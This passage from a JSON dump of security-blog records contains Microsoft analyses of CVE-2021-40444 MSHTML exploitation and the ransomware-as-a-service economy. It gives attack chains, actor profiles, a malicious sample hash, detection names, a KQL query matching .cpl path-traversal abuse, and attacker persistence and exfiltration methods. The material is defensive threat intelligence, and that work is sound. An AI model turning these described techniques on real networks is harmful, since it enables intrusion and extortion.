payload communicates with._\n\nContent that is downloaded from an external source is tagged by the Windows operating system with a mark of the web, indicating it was downloaded from a potentially untrusted source. This invokes Protected Mode in Microsoft Office, requiring user interaction to disable it to run content such as macros. However, in this instance, when opened without a mark of the web present, the document\u2019s payload executed immediately without user interaction \u2013 indicating the abuse of a vulnerability.\n\n\n\n_Figure 2. Attack chain of DEV-0413 campaign that used CVE-2021-40444_\n\n## DEV-0413 observed exploiting CVE-2021-40444\n\nAs part of Microsoft\u2019s ongoing commitment to tracking both nation state and cybercriminal threat actors, we refer to the unidentified threat actor as a \u201cdevelopment group\u201d and utilize a threat actor naming structure with a prefix of \u201cDEV\u201d to indicate an emerging threat group or unique activity during the tracking and investigation phases before MSTIC reaches high confidence about the origin or identity of the actor behind an operation. MSTIC tracks a large cluster of cybercriminal activity involving Cobalt Strike infrastructure under the name DEV-0365.\n\nThe infrastructure we associate with DEV-0365 has several overlaps in behavior and unique identifying characteristics of Cobalt Strike infrastructure that suggest it was created or managed by a distinct set of operators. However, the follow-on activity from this infrastructure indicates multiple threat actors or clusters associated with human-operated ransomware attacks (including the deployment of Conti ransomware). One explanation is that DEV-0365 is involved in a form of command- and-control infrastructure as a service for cybercriminals.\n\nAdditionally, some of the infrastructure that hosted the oleObjects utilized in the August 2021 attacks abusing CVE-2021-40444 were also involved in the delivery of BazaLoader and Trickbot payloads -- activity that overlaps with a group Microsoft tracks as DEV-0193. DEV-0193 activities overlap with actions tracked by Mandiant as UNC1878.\n\nDue to the uncertainty surrounding the nature of the shared qualities of DEV-0365 infrastructure and the significant variation in malicious activity, MSTIC clustered the initial email campaign exploitation identified as CVE-2021-40444 activity separately, under DEV-0413.\n\nThe DEV-0413 campaign that used CVE-2021-40444 has been smaller and more targeted than other malware campaigns we have identified leveraging DEV-0365 infrastructure. We observed the earliest exploitation attempt of this campaign on August 18. The social engineering lure used in the campaign, initially highlighted by Mandiant, aligned with the business operations of targeted organizations, suggesting a degree of purposeful targeting. The campaign purported to seek a developer for a mobile application, with multiple application development organizations being targeted. In most instances, file-sharing services were abused to deliver the CVE-2021-40444-laden lure.\n\nIt is worth highlighting that while monitoring the DEV-0413 campaign, Microsoft identified active DEV-0413 infrastructure hosting CVE-2021-40444 content wherein basic security principles had not been applied. DEV-0413 did not limit the browser agents able to access the server to their malware implant or known targets, thereby permitting directory listing for their web server. In doing so, the attackers exposed their exploit to anyone who might have gained interest based on public social media discussion.\n\n\n\n_Figure 3. Content of the original DEV-0413 email lure seeking application developers_\n\nAt least one organization that was successfully compromised by DEV-0413 in their August campaign was previously compromised by a wave of similarly-themed malware that interacted with DEV-0365 infrastructure almost two months before the CVE-2021-40444 attack. It is currently not known whether the retargeting of this organization was intentional, but it reinforces the connection between DEV-0413 and DEV-0365 beyond sharing of infrastructure.\n\nIn a later wave of DEV-0413 activity on September 1, Microsoft identified a lure change from targeting application developers to a \u201csmall claims court\u201d legal threat.\n\n\n\n_Figure 4. Example of the \u201cSmall claims court\u201d lure utilized by DEV-0413__ _\n\n## Vulnerability usage timeline\n\nOn August 21, 2021, MSTIC observed a social media post by a Mandiant employee with experience tracking Cobalt Strike Beacon infrastructure. This post highlighted a Microsoft Word document (SHA-256: [3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf](<https://www.virustotal.com/gui/file/3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf>)) that had been uploaded to VirusTotal on August 19, 2021. The post\u2019s focus on this document was highlighting the custom Cobalt Strike Beacon loader and did not focus on the delivery mechanism.\n\nMSTIC analyzed the sample and determined that an anomalous oleObject relationship in the document was targeted at an external malicious HTML resource with an MHTML handler and likely leading to abuse of an undisclosed vulnerability. MSTIC immediately engaged the Microsoft Security Response Center and work began on a mitigation and patch. During this process, MSTIC collaborated with the original finder at Mandiant to reduce the discussion of the issue publicly and avoid drawing threat actor attention to the issues until a patch was available. Mandiant partnered with MSTIC and did their own reverse engineering assessment and submitted their findings to MSRC.\n\nOn September 7, 2021, Microsoft released a security advisory for CVE-2021-40444 containing a partial workaround. As a routine in these instances, Microsoft was working to ensure that the detections described in the advisory would be in place and a patch would be available before public disclosure. During the same time, a third-party researcher reported a sample to Microsoft from the same campaign originally shared by Mandiant. This sample was publicly disclosed on September 8. We observed a rise in exploitation attempts within 24 hours.\n\n\n\n_Figure 5. Graphic showing original exploitation on August 18 and attempted exploitation increasing after public disclosure _\n\nMicrosoft continues to monitor the situation and work to deconflict testing from actual exploitation. Since the public disclosure, Microsoft has observed multiple threat actors, including ransomware-as-a-service affiliates, adopting publicly disclosed proof-of-concept code into their toolkits. We will continue to provide updates as we learn more.\n\n## Mitigating the attacks\n\nMicrosoft has confirmed that the following [attack surface reduction rule](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>) blocks activity associated with exploitation of CVE-2021-40444 at the time of publishing:\n\n * \u200bBlock all Office applications from creating child processes\n\nApply the following mitigations to reduce the impact of this threat and follow-on actions taken by attackers.\n\n * Apply the security updates for [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). Comprehensive updates addressing the vulnerabilities used in this campaign are available through the [September 2021 security updates](<https://msrc.microsoft.com/update-guide/>).\n * Run the latest version of your operating systems and applications. Turn on automatic updates or deploy the latest security updates as soon as they become available.\n * Use a supported platform, such as Windows 10, to take advantage of regular security updates.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>)in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants.\n * Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>)in Microsoft Defender for Endpoint, to prevent malicious changes to security settings.\n * Run [EDR in block mode](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>)so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.\n * Enable [investigation and remediation](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>)in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.\n * Use [device discovery](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>)to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.\n\n## Microsoft 365 Defender detection details\n\n**Antivirus**\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * [TrojanDownloader:O97M/Donoff.SA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:O97M/Donoff.SA&threatId=-2147225317>) \u2013 Detects the Word Doc files in the observed attacks\n * [TrojanDownloader:HTML/Donoff.SA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:HTML/Donoff.SA&threatId=-2147174205>) \u2013 Detects the remotely-loaded HTML\n * [Trojan:Win32/Agent.SA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Agent.SA&threatId=-2147178093>) -- Detects the .inf(Dll)/CAB components in the observed attacks\n * [Trojan:Win32/CplLoader.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/CplLoader.A&threatId=-2147178092>) \u2013 Blocks Rundll32/Control abuse used in this CVE exploitation\n * [Behavior:Win32/OfficeMhtInj.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/OfficeMhtInj.A&threatId=-2147178094>) \u2013 Detects the injection into wabmig.exe\n * [TrojanDownloader:O97M/Donoff.SA!CAB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:O97M/Donoff.SA!CAB&threatId=-2147173661>) \u2013 Detects CAB files in observed attacks\n * [TrojanDownloader:O97M/Donoff.SA!Gen](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:O97M/Donoff.SA!Gen&threatId=-2147173660>) \u2013 Detects Office documents in observed attacks\n\n**Endpoint detection and response (EDR)**\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * Possible exploitation of CVE-2021-40444 (requires Defender Antivirus as the Active AV)\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious Behavior By Office Application (detects the anomalous process launches that happen in exploitation of this CVE, and other malicious behavior)\n * Suspicious use of Control Panel item\n\n**Microsoft Defender for Office365**\n\nMicrosoft Defender for Office 365 detects exploit documents delivered via email when detonation is enabled using the following detection names:\n\n * Trojan_DOCX_OLEAnomaly_A \n * Description = "The sample is an Office document which contains a suspicious oleobject definition."\n * Trojan_DOCX_OLEAnomaly_AB \n * Description = "The sample is an Office document which exhibits malicious template injection qualities."\n * Exploit_Office_OleObject_A \n * Description = "This sample is an Office document which exhibits malicious qualities."\n * Exploit_Office_OleObject_B \n * Description = "This sample is an Office document which exhibits malicious qualities."\n\nThe following alerts in your portal indicate that a malicious attachment has been blocked, although these alerts are also used for many different threats:\n\n * Malware campaign detected and blocked\n * Malware campaign detected after delivery\n * Email messages containing malicious file removed after delivery\n\n## Advanced hunting\n\nTo locate possible exploitation activity, run the following queries.\n\n**Relative path traversal (requires Microsoft 365 Defender)**\n\nUse the following query to surface abuse of Control Panel objects (.cpl) via URL protocol handler path traversal as used in the original attack and public proof of concepts at time of publishing:\n\n`DeviceProcessEvents \n| where (FileName in~('control.exe','rundll32.exe') and ProcessCommandLine has '.cpl:') \nor ProcessCommandLine matches regex @'\\\"\\.[a-zA-Z]{2,4}:\\.\\.\\/\\.\\.'`\n\n**Azure Sentinel **\n\nTo locate possible attacks that exploit the CVE-2021-40444 , Azure Sentinel customers can leverage the following detection query: [Azure Sentinel MSHTML exploit detection](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/MSHTMLVuln.yaml>).\n\n \n\nThe post [Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {}, "published": "2021-09-15T23:40:56", "type": "mmpc", "title": "Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-15T23:40:56", "id": "MMPC:795E0A765679492C51FEFA2B19EAD597", "href": "https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T16:00:24", "description": "Microsoft processes 24 trillion signals every 24 hours, and we have blocked billions of attacks in the last year alone. Microsoft Security tracks more than 35 unique ransomware families and 250 unique threat actors across observed nation-state, ransomware, and criminal activities.\n\nThat depth of signal intelligence gathered from various domains\u2014identity, email, data, and cloud\u2014provides us with insight into the gig economy that attackers have created with tools designed to lower the barrier for entry for other attackers, who in turn continue to pay dividends and fund operations through the sale and associated \u201ccut\u201d from their tool\u2019s success.\n\nThe cybercriminal economy is a continuously evolving connected ecosystem of many players with different techniques, goals, and skillsets. In the same way our traditional economy has shifted toward gig workers for efficiency, criminals are learning that there\u2019s less work and less risk involved by renting or selling their tools for a portion of the profits than performing the attacks themselves. This industrialization of the cybercrime economy has made it easier for attackers to use ready-made penetration testing and other tools to perform their attacks.\n\nWithin this category of threats, Microsoft has been tracking the trend in the ransomware-as-a-service (RaaS) gig economy, called [human-operated ransomware](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>), which remains one of the most impactful threats to organizations. We coined the industry term \u201chuman-operated ransomware\u201d to clarify that these threats are driven by humans who make decisions at every stage of their attacks based on what they find in their target\u2019s network.\n\nUnlike the broad targeting and opportunistic approach of earlier ransomware infections, attackers behind these human-operated campaigns vary their attack patterns depending on their discoveries\u2014for example, a security product that isn\u2018t configured to prevent tampering or a service that\u2019s running as a highly privileged account like a domain admin. Attackers can use those weaknesses to elevate their privileges to steal even more valuable data, leading to a bigger payout for them\u2014with no guarantee they\u2019ll leave their target environment once they\u2019ve been paid. Attackers are also often more determined to stay on a network once they gain access and sometimes repeatedly monetize that access with additional attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nRansomware attacks have become even more impactful in recent years as more ransomware-as-a-service ecosystems have adopted the double extortion monetization strategy. All ransomware is a form of extortion, but now, attackers are not only encrypting data on compromised devices but also exfiltrating it and then posting or threatening to post it publicly to pressure the targets into paying the ransom. Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to, and some even purchase access to networks from other cybercriminals. Some attackers prioritize organizations with higher revenues, while others prefer specific industries for the shock value or type of data they can exfiltrate.\n\nAll human-operated ransomware campaigns\u2014all human-operated attacks in general, for that matter\u2014share common dependencies on security weaknesses that allow them to succeed. Attackers most commonly take advantage of **an organization\u2019s poor credential hygiene and legacy configurations or misconfigurations to find easy entry and privilege escalation points in an environment.** \n\nIn this blog, we detail several of the ransomware ecosystems using the RaaS model, the importance of cross-domain visibility in finding and evicting these actors, and best practices organizations can use to protect themselves from this increasingly popular style of attack. We also offer security best practices on credential hygiene and cloud hardening, how to address security blind spots, harden internet-facing assets to understand your perimeter, and more. Here\u2019s a quick table of contents:\n\n 1. **How RaaS redefines our understanding of ransomware incidents**\n * The RaaS affiliate model explained\n * Access for sale and mercurial targeting\n 2. **\u201cHuman-operated\u201d means human decisions**\n * Exfiltration and double extortion\n * Persistent and sneaky access methods\n 3. **Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks**\n 4. **Defending against ransomware: Moving beyond protection by detection**\n * Building credential hygiene\n * Auditing credential exposure\n * Prioritizing deployment of Active Directory updates\n * Cloud hardening\n * Addressing security blind spots\n * Reducing the attack surface\n * Hardening internet-facing assets and understanding your perimeter\n\n## How RaaS redefines our understanding of ransomware incidents\n\nWith ransomware being the preferred method for many cybercriminals to monetize attacks, human-operated ransomware remains one of the most impactful threats to organizations today, and it only continues to evolve. This evolution is driven by the \u201chuman-operated\u201d aspect of these attacks\u2014attackers make informed and calculated decisions, resulting in varied attack patterns tailored specifically to their targets and iterated upon until the attackers are successful or evicted.\n\nIn the past, we\u2019ve observed a tight relationship between the initial entry vector, tools, and ransomware payload choices in each campaign of one strain of ransomware. The RaaS affiliate model, which has allowed more criminals, regardless of technical expertise, to deploy ransomware built or managed by someone else, is weakening this link. As ransomware deployment becomes a gig economy, it has become more difficult to link the tradecraft used in a specific attack to the ransomware payload developers.\n\nReporting a ransomware incident by assigning it with the payload name gives the impression that a monolithic entity is behind all attacks using the same ransomware payload and that all incidents that use the ransomware share common techniques and infrastructure. However, focusing solely on the ransomware stage obscures many stages of the attack that come before, including actions like data exfiltration and additional persistence mechanisms, as well as the numerous detection and protection opportunities for network defenders.\n\nWe know, for example, that the underlying techniques used in human-operated ransomware campaigns haven\u2019t changed very much over the years\u2014attacks still prey on the same security misconfigurations to succeed. Securing a large corporate network takes disciplined and sustained focus, but there\u2019s a high ROI in implementing critical controls that prevent these attacks from having a wider impact, even if it\u2019s only possible on the most critical assets and segments of the network. \n\nWithout the ability to steal access to highly privileged accounts, attackers can\u2019t move laterally, spread ransomware widely, access data to exfiltrate, or use tools like Group Policy to impact security settings. Disrupting common attack patterns by applying security controls also reduces alert fatigue in security SOCs by stopping the attackers before they get in. This can also prevent unexpected consequences of short-lived breaches, such as exfiltration of network topologies and configuration data that happens in the first few minutes of execution of some trojans.\n\nIn the following sections, we explain the RaaS affiliate model and disambiguate between the attacker tools and the various threat actors at play during a security incident. Gaining this clarity helps surface trends and common attack patterns that inform defensive strategies focused on preventing attacks rather than detecting ransomware payloads. Threat intelligence and insights from this research also enrich our solutions like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), whose comprehensive security capabilities help protect customers by detecting RaaS-related attack attempts.\n\n### The RaaS affiliate model explained\n\nThe cybercriminal economy\u2014a connected ecosystem of many players with different techniques, goals, and skillsets\u2014is evolving. The industrialization of attacks has progressed from attackers using off-the-shelf tools, such as Cobalt Strike, to attackers being able to purchase access to networks and the payloads they deploy to them. This means that the impact of a successful ransomware and extortion attack remains the same regardless of the attacker\u2019s skills.\n\nRaaS is an arrangement between an operator and an affiliate. The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. The RaaS program may also include a leak site to share snippets of data exfiltrated from victims, allowing attackers to show that the exfiltration is real and try to extort payment. Many RaaS programs further incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure, and cryptocurrency transaction services\n\nRaaS thus gives a unified appearance of the payload or campaign being a single ransomware family or set of attackers. However, what happens is that the RaaS operator sells access to the ransom payload and decryptor to an affiliate, who performs the intrusion and privilege escalation and who is responsible for the deployment of the actual ransomware payload. The parties then split the profit. In addition, RaaS developers and operators might also use the payload for profit, sell it, and run their campaigns with other ransomware payloads\u2014further muddying the waters when it comes to tracking the criminals behind these actions.\n\nFigure 1. How the RaaS affiliate model enables ransomware attacks\n\n### Access for sale and mercurial targeting\n\nA component of the cybercriminal economy is selling access to systems to other attackers for various purposes, including ransomware. Access brokers can, for instance, infect systems with malware or a botnet and then sell them as a \u201cload\u201d. A load is designed to install other malware or backdoors onto the infected systems for other criminals. Other access brokers scan the internet for vulnerable systems, like exposed Remote Desktop Protocol (RDP) systems with weak passwords or unpatched systems, and then compromise them _en masse_ to \u201cbank\u201d for later profit. Some advertisements for the sale of initial access specifically cite that a system isn\u2019t managed by an antivirus or endpoint detection and response (EDR) product and has a highly privileged credential such as Domain Administrator associated with it to fetch higher prices.\n\nMost ransomware attackers opportunistically deploy ransomware to whatever network they get access to. Some attackers prioritize organizations with higher revenues, while some target specific industries for the shock value or type of data they can exfiltrate (for example, attackers targeting hospitals or exfiltrating data from technology companies). In many cases, the targeting doesn\u2019t manifest itself as specifically attacking the target\u2019s network, instead, the purchase of access from an access broker or the use of existing malware infection to pivot to ransomware activities.\n\nIn some ransomware attacks, the affiliates who bought a load or access may not even know or care how the system was compromised in the first place and are just using it as a \u201cjump server\u201d to perform other actions in a network. Access brokers often list the network details for the access they are selling, but affiliates aren\u2019t usually interested in the network itself but rather the monetization potential. As a result, some attacks that seem targeted to a specific industry might simply be a case of affiliates purchasing access based on the number of systems they could deploy ransomware to and the perceived potential for profit.\n\n## \u201cHuman-operated\u201d means human decisions\n\nMicrosoft coined the term \u201chuman-operated ransomware\u201d to clearly define a class of attacks driven by expert human intelligence at every step of the attack chain and culminate in intentional business disruption and extortion. Human-operated ransomware attacks share commonalities in the security misconfigurations of which they take advantage and the manual techniques used for lateral movement and persistence. However, the human-operated nature of these actions means that variations in attacks\u2014including objectives and pre-ransom activity\u2014evolve depending on the environment and the unique opportunities identified by the attackers.\n\nThese attacks involve many reconnaissance activities that enable human operators to profile the organization and know what next steps to take based on specific knowledge of the target. Many of the initial access campaigns that provide access to RaaS affiliates perform automated reconnaissance and exfiltration of information collected in the first few minutes of an attack.\n\nAfter the attack shifts to a hands-on-keyboard phase, the reconnaissance and activities based on this knowledge can vary, depending on the tools that come with the RaaS and the operator\u2019s skill. Frequently attackers query for the currently running security tools, privileged users, and security settings such as those defined in Group Policy before continuing their attack. The data discovered via this reconnaissance phase informs the attacker\u2019s next steps.\n\nIf there\u2019s minimal security hardening to complicate the attack and a highly privileged account can be gained immediately, attackers move directly to deploying ransomware by editing a Group Policy. The attackers take note of security products in the environment and attempt to tamper with and disable these, sometimes using scripts or tools provided with RaaS purchase that try to disable multiple security products at once, other times using specific commands or techniques performed by the attacker. \n\nThis human decision-making early in the reconnaissance and intrusion stages means that even if a target\u2019s security solutions detect specific techniques of an attack, the attackers may not get fully evicted from the network and can use other collected knowledge to attempt to continue the attack in ways that bypass security controls. In many instances, attackers test their attacks \u201cin production\u201d from an undetected location in their target\u2019s environment, deploying tools or payloads like commodity malware. If these tools or payloads are detected and blocked by an antivirus product, the attackers simply grab a different tool, modify their payload, or tamper with the security products they encounter. Such detections could give SOCs a false sense of security that their existing solutions are working. However, these could merely serve as a smokescreen to allow the attackers to further tailor an attack chain that has a higher probability of success. Thus, when the attack reaches the active attack stage of deleting backups or shadow copies, the attack would be minutes away from ransomware deployment. The adversary would likely have already performed harmful actions like the exfiltration of data. This knowledge is key for SOCs responding to ransomware: prioritizing investigation of alerts or detections of tools like Cobalt Strike and performing swift remediation actions and incident response (IR) procedures are critical for containing a human adversary before the ransomware deployment stage.\n\n### Exfiltration and double extortion\n\nRansomware attackers often profit simply by disabling access to critical systems and causing system downtime. Although that simple technique often motivates victims to pay, it is not the only way attackers can monetize their access to compromised networks. Exfiltration of data and \u201cdouble extortion,\u201d which refers to attackers threatening to leak data if a ransom hasn\u2019t been paid, has also become a common tactic among many RaaS affiliate programs\u2014many of them offering a unified leak site for their affiliates. Attackers take advantage of common weaknesses to exfiltrate data and demand ransom without deploying a payload.\n\nThis trend means that focusing on protecting against ransomware payloads via security products or encryption, or considering backups as the main defense against ransomware, instead of comprehensive hardening, leaves a network vulnerable to all the stages of a human-operated ransomware attack that occur before ransomware deployment. This exfiltration can take the form of using tools like Rclone to sync to an external site, setting up email transport rules, or uploading files to cloud services. With double extortion, attackers don\u2019t need to deploy ransomware and cause downtime to extort money. Some attackers have moved beyond the need to deploy ransomware payloads and are shifting straight to extortion models or performing the destructive objectives of their attacks by directly deleting cloud resources. One such extortion attackers is DEV-0537 (also known as LAPSUS$), which is profiled below. \n\n### Persistent and sneaky access methods\n\nPaying the ransom may not reduce the risk to an affected network and potentially only serves to fund cybercriminals. Giving in to the attackers\u2019 demands doesn\u2019t guarantee that attackers ever \u201cpack their bags\u201d and leave a network. Attackers are more determined to stay on a network once they gain access and sometimes repeatedly monetize attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nThe handoff between different attackers as transitions in the cybercriminal economy occur means that multiple attackers may retain persistence in a compromised environment using an entirely different set of tools from those used in a ransomware attack. For example, initial access gained by a banking trojan leads to a Cobalt Strike deployment, but the RaaS affiliate that purchased the access may choose to use a less detectable remote access tool such as TeamViewer to maintain persistence on the network to operate their broader series of campaigns. Using legitimate tools and settings to persist versus malware implants such as Cobalt Strike is a popular technique among ransomware attackers to avoid detection and remain resident in a network for longer.\n\nSome of the common enterprise tools and techniques for persistence that Microsoft has observed being used include:\n\n * AnyDesk\n * Atera Remote Management\n * ngrok.io\n * Remote Manipulator System\n * Splashtop\n * TeamViewer\n\nAnother popular technique attackers perform once they attain privilege access is the creation of new backdoor user accounts, whether local or in Active Directory. These newly created accounts can then be added to remote access tools such as a virtual private network (VPN) or Remote Desktop, granting remote access through accounts that appear legitimate on the network. Ransomware attackers have also been observed editing the settings on systems to enable Remote Desktop, reduce the protocol\u2019s security, and add new users to the Remote Desktop Users group.\n\nThe time between initial access to a hands-on keyboard deployment can vary wildly depending on the groups and their workloads or motivations. Some activity groups can access thousands of potential targets and work through these as their staffing allows, prioritizing based on potential ransom payment over several months. While some activity groups may have access to large and highly resourced companies, they prefer to attack smaller companies for less overall ransom because they can execute the attack within hours or days. In addition, the return on investment is higher from companies that can\u2019t respond to a major incident. Ransoms of tens of millions of dollars receive much attention but take much longer to develop. Many groups prefer to ransom five to 10 smaller targets in a month because the success rate at receiving payment is higher in these targets. Smaller organizations that can\u2019t afford an IR team are often more likely to pay tens of thousands of dollars in ransom than an organization worth millions of dollars because the latter has a developed IR capability and is likely to follow legal advice against paying. In some instances, a ransomware associate threat actor may have an implant on a network and never convert it to ransom activity. In other cases, initial access to full ransom (including handoff from an access broker to a RaaS affiliate) takes less than an hour.\n\nFigure 2. Human-operated ransomware targeting and rate of success, based on a sampling of Microsoft data over six months between 2021 and 2022\n\nThe human-driven nature of these attacks and the scale of possible victims under control of ransomware-associated threat actors underscores the need to take targeted proactive security measures to harden networks and prevent these attacks in their early stages.\n\n## Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks\n\nFor organizations to successfully respond to evict an active attacker, it\u2019s important to understand the active stage of an ongoing attack. In the early attack stages, such as deploying a banking trojan, common remediation efforts like isolating a system and resetting exposed credentials may be sufficient. As the attack progresses and the attacker performs reconnaissance activities and exfiltration, it\u2019s important to implement an incident response process that scopes the incident to address the impact specifically. Using a threat intelligence-driven methodology for understanding attacks can assist in determining incidents that need additional scoping.\n\nIn the next sections, we provide a deep dive into the following prominent ransomware threat actors and their campaigns to increase community understanding of these attacks and enable organizations to better protect themselves:\n\n * DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today \n * ELBRUS: (Un)arrested development\n * DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n * DEV-0237: Prolific collaborator\n * DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n * DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n * DEV-0537: From extortion to destruction\n\nMicrosoft threat intelligence directly informs our products as part of our commitment to track adversaries and protect customers. Microsoft 365 Defender customers should prioritize alerts titled \u201cRansomware-linked emerging threat activity group detected\u201d. We also add the note \u201cOngoing hands-on-keyboard attack\u201d to alerts that indicate a human attacker is in the network. When these alerts are raised, it\u2019s highly recommended to initiate an incident response process to scope the attack, isolate systems, and regain control of credentials attackers may be in control of.\n\nA note on threat actor naming: as part of Microsoft\u2019s ongoing commitment to track both nation-state and cybercriminal threat actors, we refer to the unidentified threat actors as a \u201cdevelopment group\u201d. We use a naming structure with a prefix of \u201cDEV\u201d to indicate an emerging threat group or unique activity during investigation. When a nation-state group moves out of the DEV stage, we use chemical elements (for example, PHOSPHOROUS and NOBELIUM) to name them. On the other hand, we use volcano names (such as ELBRUS) for ransomware or cybercriminal activity groups that have moved out of the DEV state. In the cybercriminal economy, relationships between groups change very rapidly. Attackers are known to hire talent from other cybercriminal groups or use \u201ccontractors,\u201d who provide gig economy-style work on a limited time basis and may not rejoin the group. This shifting nature means that many of the groups Microsoft tracks are labeled as DEV, even if we have a concrete understanding of the nature of the activity group.\n\n### DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today\n\nA vast amount of the current cybercriminal economy connects to a nexus of activity that Microsoft tracks as DEV-0193, also referred to as Trickbot LLC. DEV-0193 is responsible for developing, distributing, and managing many different payloads, including Trickbot, Bazaloader, and AnchorDNS. In addition, DEV-0193 managed the Ryuk RaaS program before the latter\u2019s shutdown in June 2021, and Ryuk\u2019s successor, Conti as well as Diavol. Microsoft has been tracking the activities of DEV-0193 since October 2020 and has observed their expansion from developing and distributing the Trickbot malware to becoming the most prolific ransomware-associated cybercriminal activity group active today. \n\nDEV-0193\u2019s actions and use of the cybercriminal gig economy means they often add new members and projects and utilize contractors to perform various parts of their intrusions. As other malware operations have shut down for various reasons, including legal actions, DEV-0193 has hired developers from these groups. Most notable are the acquisitions of developers from Emotet, Qakbot, and IcedID, bringing them to the DEV-0193 umbrella.\n\nA subgroup of DEV-0193, which Microsoft tracks as DEV-0365, provides infrastructure-as-a-service for cybercriminals. Most notably, DEV-0365 provides Cobalt Strike Beacon-as-a-service. These DEV-0365 Beacons have replaced unique C2 infrastructure in many active malware campaigns. DEV-0193 infrastructure has also been [implicated](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in attacks deploying novel techniques, including exploitation of CVE-2021-40444. \n\nThe leaked chat files from a group publicly labeled as the \u201cConti Group\u201d in February 2022 confirm the wide scale of DEV-0193 activity tracked by Microsoft. Based on our telemetry from 2021 and 2022, Conti has become one of the most deployed RaaS ecosystems, with multiple affiliates concurrently deploying their payload\u2014even as other RaaS ecosystems (DarkSide/BlackMatter and REvil) ceased operations. However, payload-based attribution meant that much of the activity that led to Conti ransomware deployment was attributed to the \u201cConti Group,\u201d even though many affiliates had wildly different tradecraft, skills, and reporting structures. Some Conti affiliates performed small-scale intrusions using the tools offered by the RaaS, while others performed weeks-long operations involving data exfiltration and extortion using their own techniques and tools. One of the most prolific and successful Conti affiliates\u2014and the one responsible for developing the \u201cConti Manual\u201d leaked in August 2021\u2014is tracked as DEV-0230. This activity group also developed and deployed the FiveHands and HelloKitty ransomware payloads and often gained access to an organization via DEV-0193\u2019s BazaLoader infrastructure.\n\n### ELBRUS: (Un)arrested development\n\nELBRUS, also known as FIN7, has been known to be in operation since 2012 and has run multiple campaigns targeting a broad set of industries for financial gain. ELBRUS has deployed point-of-sale (PoS) and ATM malware to collect payment card information from in-store checkout terminals. They have also targeted corporate personnel who have access to sensitive financial data, including individuals involved in SEC filings.\n\nIn 2018, this activity group made headlines when [three of its members were arrested](<https://www.justice.gov/opa/pr/three-members-notorious-international-cybercrime-group-fin7-custody-role-attacking-over-100>). In May 2020, another arrest was made for an individual with alleged involvement with ELBRUS. However, despite law enforcement actions against suspected individual members, Microsoft has observed sustained campaigns from the ELBRUS group itself during these periods.\n\nELBRUS is responsible for developing and distributing multiple custom malware families used for persistence, including JSSLoader and Griffon. ELBRUS has also created fake security companies called \u201cCombi Security\u201d and \u201cBastion Security\u201d to facilitate the recruitment of employees to their 